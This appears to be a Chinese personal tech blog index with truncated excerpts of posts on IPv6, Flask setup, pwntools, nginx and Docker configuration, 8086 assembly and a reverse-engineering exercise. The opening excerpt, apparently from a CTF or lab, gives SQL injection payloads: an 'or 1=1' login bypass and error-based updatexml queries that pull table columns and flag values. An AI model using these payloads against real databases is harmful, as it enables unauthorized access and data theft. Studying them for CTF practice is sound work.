Spencer

1select * from username where user='admin' or 1=1 #' 1searchitem=flag' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flags'),0x7e),1) # 1searchitem=flag' and updatexml(1,concat(0x7e,(select group_concat(flag) from sqli.flags),0x7e),1) # 1searchitem=flag' and updatexml(1,concat(0x7e,(select substr(flag,-30) from sqli.flags),0x7e),1) #

更详细的内容请见 https://blog.csdn.net/qq_38265137/article/details/80439611?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168157237616800188531126%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168157237616800188531126&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-80439611-null-null.142^v83^insert_down38,239^v2^insert_chatgpt&utm_term=ipv6&spm=1018.2226.3001.4187 首先我们知道ipv6地址是128位，用冒号分隔开，分隔成8段，每段16位，但是 ...

我们首先在gitee中按照教程拉取项目到本地，进行部署和运行， 1git clone 之后 我们进行初始化的一些设置 1234flask db init#创建一个数据记录框架文件，下面的操作要向框架文件中填入初始化数据flask db migrate -m "数据初始化"flask db upgrade最后向数据库中写入我们本项目需要的表中的数据flask admin init#创建admin用户的相关信息 到此部署成功。

pwntools库可以用python中的pip安装。常见函数区别 12345678p32()32位整数转换为4字节的二进制表示形式p64()将64位整数转换为8字节2进制表示process()连接本地remote('ip',port)连接远程ELF.symbols()获取elf文件中符号表信息的函数elf.symbols[‘main’]将会返回指向main函数的地址recvuntil(str)就是接收data一直到特殊的str出现//recvuntil("123")interactive()让我们进行交互式shell 需要注意的是，p32()和p64()函数是按照机器的大小端模式（endianness）来生成二进制表示形式的。在大多数x86架构的系统中，使用小端模式（little-endian）来存储数据，因此生成的二进制表示形式是小端模式的。如果要在大端模式（big-endian）系统上使用这些函数，可能需要使用pack()函数来指定字节顺序。 12p32(0x01020304)存入内存中其实就变成b'\x04\x03\x02\x01 ...

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100server { listen 80; listen [::]:80; server_name 1.mathming.top; return 301 https://$server_name:443$request_uri;}server { listen 80; listen [::]:80; server_name cv.mathming.ltd; return 301 https://$server_name:443$request_uri;}server { listen 80; listen ...

使用dockerfile定制镜像下面先来尝试一个nginx镜像（构建好的镜像内会有一个 /usr/share/nginx/html/index.html 文件） 空目录下新建一个名为Dockerfile的文件，并且添加以下内容 12FROM nginxRUN echo '这是一个本地构建的nginx镜像' > /usr/share/nginx/html/index.html FROM：定制的镜像都是基于 FROM 的镜像，这里的 nginx 就是定制需要的基础镜像。后续的操作都是基于 nginx。 RUN：用于执行后面跟着的命令行命令。有以下俩种格式： 1RUN 命令行命令 exec格式 1RUN ["可执行文件","参数1","参数2"] dockerfile的指令每执行一次都会在docker上新建一层，所以过多无意义的层，会造成镜像过度膨大，比如 1234FROM centosRUN yum -y install wgetRUN wget -O redis.tar.gz "http:// ...

12345678910111213141516171819202122232425262728293031323334首先每一行是160个字节，一共25行80列。初始显存位B800:0000开始show_str:push cx push dx push si mov ax B800 mov es,ax#先把段地址放起来 mov ax,0 mov al,160 mul dh#一行160，✖️行数结果存在ax中 mov bx,ax#行偏移地址（乘法保存在哪来着） mov al,2 mul dl add bx,ax#行偏和列偏加起来 mov di,0 mov al,cl#字符属性 mov ch,0 show:mov cl,ds:[si] jcxz ok#如果放进来直接就是0，那么直接就推出了。 ...

我们先来看上一章的实验十 实验十 编写子程序一.显示字符串 也就是我们要自己编写子程序显示的部分！ 代码如下： 1234567891011121314151617181920212223242526272829303132333435show_str:push cx push dx push si#先把这些跳出程序还要用的寄存器的值先入栈！ mov ax,B800h#先找到每个字符对应的偏移地址！这是段地址 mov es,ax#先把段地址放es存着，接下来还要算偏移地址 mov ax,0 mov al,160 mul dh#因为是第八行，每一行160字节 mov bx,ax#找到行偏移地址。 mov ax,0//清零 mov al,2 mul dl add bx,ax#把行偏和列偏加起来。 mov di,0 mov al,c ...

第一题首先我们进入服务器，然后通过服务器进入内网服务器，这里只需要ssh。 进入之后使用sftp将文件下载到我们自己的服务器上。或者使用sz传输等。 之后根据提示，文件名叫strings_attached，我们用strings查看二进制文件里的字符串 1strings strings_attached 得到以下结果 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596$ wk6_re strings strings_attached/usr/libexec/ld.soOpenBSD_csu_finishexit_Jv_RegisterClassesatexitputs_endlibc.so.96.0A string that pulled me Out of all the ...